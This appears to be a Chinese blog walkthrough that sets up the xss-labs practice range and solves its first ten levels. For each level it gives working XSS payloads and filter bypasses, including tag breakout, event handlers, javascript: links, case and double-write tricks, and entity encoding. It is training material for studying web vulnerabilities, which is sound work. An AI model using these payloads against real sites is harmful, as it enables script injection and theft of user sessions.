XSS靶场搭建以及前十关详解

最新推荐文章于 2024-10-29 23:41:34 发布
最新推荐文章于 2024-10-29 23:41:34 发布
阅读量498 收藏 4
点赞数
文章标签: xss 前端 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/GN_QT/article/details/132022488
版权

靶场搭建

xss靶场下载: https://gitcode.net/mirrors/do0dl3/xss-labs?utm_source=csdn_github_accelerator

这里是在小皮里面搭建的

将下载的xss压缩包解压在www目录下,

 可以直接在浏览器中访问 localhost/xss/xss-labs-master/

靶场这样就搭建好了

第一关

 通过测试发现url中?name=处存在写入点

构造payload: <script>alert(1)</script> 完成弹窗

第二关

 发现写入点为输入框

 

发现需要先闭合前面的标签 使用"> 进行闭合

构造payload: "> <script>alert(1)</script>

第三关

 

 

 发现过滤了<>,使用了编码,双引号也被实体编码了

构造onmouseout鼠标移动 payload: 'οnmοuseοut=' alert(/xss/)

第四关

 也是实体化过滤了"<>等字符

可以构造payload: " οnmοuseοut=" alert(/xss/)

 第五关

过滤了on " <>

 

构造a 标签payload: "> <a href="javascript:alert('xss')">aaa</a>

 第六关

过滤了href

 使用大写进行绕过

"> <a HRef="javascript:alert('xss')">aaa</a>

另一种 " ONCLICK="alert('xxx')"

第七关

过滤了src, script, on字符,使用双写进行绕过

构造payload:"> <iframe srsrcc="javascripscriptt:alert(/xss/)

"> <input oonnmouseout="alert(/xss/)>

第八关

存在一个友情链接,点开会发现

 通过输入字符测试,发现过滤了许多字符

 尝试大小写,双写绕过都不行,只能尝试一下实体编码了

 构造payload: java&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert(/xxx/)

第九关

也是友情链接,但是随便输入a标签提示连接不合法? 有没有!

就想到了http和https

构造payload:java&#x73;&#x63;&#x72;ipt:alert()  // http://

 第十关

url中含有keyword,输入相关参数后并没有回显,通过检测input是否可以传入参数

发现写入点,input可以创建文本框,添加一个type值

构造payload: t_sort= "οnclick= "alert()"  type ="text"(删除url中的keyword)成功回显

 

 

GN_QT
关注
[网络安全提高篇] 一〇四.网络渗透靶场Oracle+phpStudy本地搭建万字详解(SQL注入、XSS攻击、文件上传漏洞)
杨秀璋的专栏
03-23 6861
文带领大家深入Metasploit技术,涉及后渗透相关的技术,包括信息收集、权限提权、移植漏洞模块和后门。这篇文章将教大家搭建一个Oracle+phpStudy本地网络渗透靶场,并应用SQL注入、XSS攻击、文件上传漏洞三个场景。在搭建Oracle环境时遇到的各种问题,所幸写一篇详细的教程供大家学习,下一篇将详细介绍Oracle注入漏洞。本文参考了Cream、Fox、c0ny1好友兼老师的文章和代码,非常感谢。
xss-labs通关详解 Level 6-10
qq_41755084的博客
10-25 1118
这一关整体上与第五关类似,只是黑名单的量增加了,尝试了href、src等字段,都被替换掉了。不过这个黑名单是大小写敏感的,而在html语句中,大小写不敏感。我们可以使用大小写字段进行绕过。构造注入代码从keyword参数处传入。将href的f大写,变为hreF,绕过黑名单,页面上成功插入了标签。点击该标签,成功弹窗。
XSS Game靶场练习
qq_64338246的博客
08-17 1177
虽然这里又用了innerHTML,但是过滤了括号会导致无法触发函数,所以不能像第一关那样直接用img标签。这里用双引号闭合,让jeff=aaa正常执行(aaa可以换成别的),然后在后面继续执行弹出1337的命令。用location把编码的符号变成字符串,然后再用括号的替代品如%2528和%2529来进行绕过。实际操作时可以看到,网页在加载完成后,经过两秒会再加载一次,这里就是在进行submit的提交。这一关依旧是get传参,只是多了一个submit提交事件,配合定时器在两秒后自动提交。
xss靶场搭建
2302_80147678的博客
10-29 169
4.在浏览器中输入127.0.0.1/xss-labs-master。2.将源码下载好后解压放入phpstudy的www下。注:xss-labs后续通关教程陆续更新。3.启动apache和mysql。进入xss-labs靶场
XSS入门 XSS Challenges靶场搭建/五关/基础教程
ChenD的学习笔记
10-11 1322
XSSChallenges 五关,XSS注入点判断
xss漏洞(二,xss靶场搭建以及简单利用)
2302_80280669的博客
08-02 756
使用工具:PHP study,dvwa靶场
[ 靶场环境篇 ] XSS-labs 靶场环境搭建(特别详细)
热门推荐
qq_51577576的博客
12-10 1万+
想入门渗透行业呢光有理论基础是不够的,更重要的是实践经验。 接下来我会分享一些入门级靶场,从环境搭建一直到通关教程。 入门级靶场会分享:pikachu、DVWA、XSS-labs、sql-labs、upload-labs等内容。 上篇文章写到了 pikachu 靶场搭建,本文写 XSS-lab 靶场环境的搭建。 目录 一、环境准备 1 搭建环境 2 下载链接 二、安装教程 1. 首先我们需要搭建好PHP study: 2. 下载 xss-labs 靶场源码 3.解压缩并放入如下..
104.[提高班]网络渗透靶场Oracle+phpStudy本地搭建万字详解1
08-03
作者计划分享更多关于Web渗透、内网渗透、靶场搭建、CVE复现等高级网络安全主题,帮助读者深入学习网络安全和系统安全知识。 总的来说,这篇万字详解提供了丰富的实践指导,旨在让读者在理解网络安全理论的同时,...
Pikachu靶场-xss详解
qq_53083285的博客
10-30 7974
Picachu靶场-xss跨站脚本漏洞概述跨站脚本漏洞类型及测试流程反射型XSS(post&get)存储型XSSDom型XSSxss-获取cookiexss-进行钓鱼xss-获取键盘记录xss盲打xss的过滤和绕过xss输出在href和js中的案例xss的防范措施 XSS-跨站脚本漏洞目录 跨站脚本漏洞概述 Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型: 1.反射性XSS; 2.存储型XSS;
DVWA专有靶场简介与搭建步骤详解
# 1. DVWA专有靶场简介 在本章中,我们将介绍DVWA(Damn ...它模拟了一些常见的Web应用漏洞,如SQL注入、跨站脚本攻击(XSS)、跨站请求伪造(CSRF)等,使用户能够在合法且受控的环境中进行漏洞测试和学习。
xss漏洞(五,xss-labs靶场搭建及简单讲解)
2302_80280669的博客
08-06 2303
本文基于github上的xss-labs靶场以及PHP study进行操作。
xss-labs靶场搭建和通关(1-18)
qq_53003652的博客
04-12 2437
这次的xsslabs通关耗费了挺多时间,由于本人才学疏浅,难免会有一些错误,希望大家能指正批评,如有疑问,可在下方留言,会第一时间进行回复!
Web安全XSS || 文件上传 靶场搭建 (玩转整个 XSS || 文件上传 环境.)
网络安全领域___专研者.
04-24 1121
XSS又叫CSS(Cross Site Script)跨站脚本攻击,指的是攻击者在Web页面,插入恶意JS代码,当用户浏览该页之时,嵌入其中JS代码就会被执行,从而达到攻击的目的.(包含:收集用户的Cookie,添加账号,修改密码,提高用户权限等等.) 文件上传漏洞是指 Web 服务器允许用户将文件上传至其文件系统,但这些文件可能并没有经过充分的验证,如文件名称、类型、内容或大小等。未能正确执行这些限制就意味着即使最基本的图像上传功能也可能用于上传任意具有潜在危险的文件,里面甚至包括远程代码执行的服务器端脚
web靶场——xss-labs靶机平台的搭建和代码审计
weixin_51525416的博客
09-05 6131
web靶场-xss-labs靶机平台的搭建和代码审计
网络安全xss-labs本地靶场新手搭建详细教程
等风来
08-03 5790
PhpStudy是一个PHP调试环境的程序集成包,集成最新的Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer,安装后无须配置即可使用。自此,xss-labs靶场搭建成功。
XSS基础及搭建DVWA靶机
CoderOne
01-20 456
XSS简述 跨站脚本攻击XSS(Cross Site Scripting),通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。XSS是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。 XSS原理 HTML是一种超文本标记语言,通过将一些字符特殊地对待来区别文本和标记,例如,小于符号(<)被看作是HTML
WEB安全渗透测试-pikachu&DVWA&sqli-labs&upload-labs&xss-labs靶场搭建(超详细)
m0_69583059的博客
01-23 3411
对于web安全刚入门的小伙伴来说,漏洞靶场搭建是很重要的,可以通过靶场学以致用,对所学知识点进行巩固练习。下面和我一起搭建5个比较常用的初学者入门靶场,演示搭建环境:win11系统+phpstudy。
XSS靶场1-2
xdjxi的博客
03-07 202
第一关 只要触发alert()函数就能跳转到下一关,其他关卡也是一样的 先找输入点2、再找输出点 那么,我们应该如何输出呢?来分析一波源码 输出在标签之间,那么直接构造:<script>alert(/xss/)</script> 第二关 ...
xss-labs靶场实战
2303_79251750的博客
07-16 557
环境搭建及下载地址,如果不想自己搭建可以使用博主的网页(尽量自己搭!)搭建完毕后打开靶场,点击图片正式开始xss之旅吧!
XSS靶场搭建
最新发布
03-12
### 如何搭建XSS(跨站脚本攻击)靶场或测试环境 为了安全有效地研究和学习XSS漏洞,建立一个受控的实验环境至关重要。这不仅有助于理解不同类型的XSS攻击机制,还能提高防御措施的设计能力。 #### 选择合适的平台...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值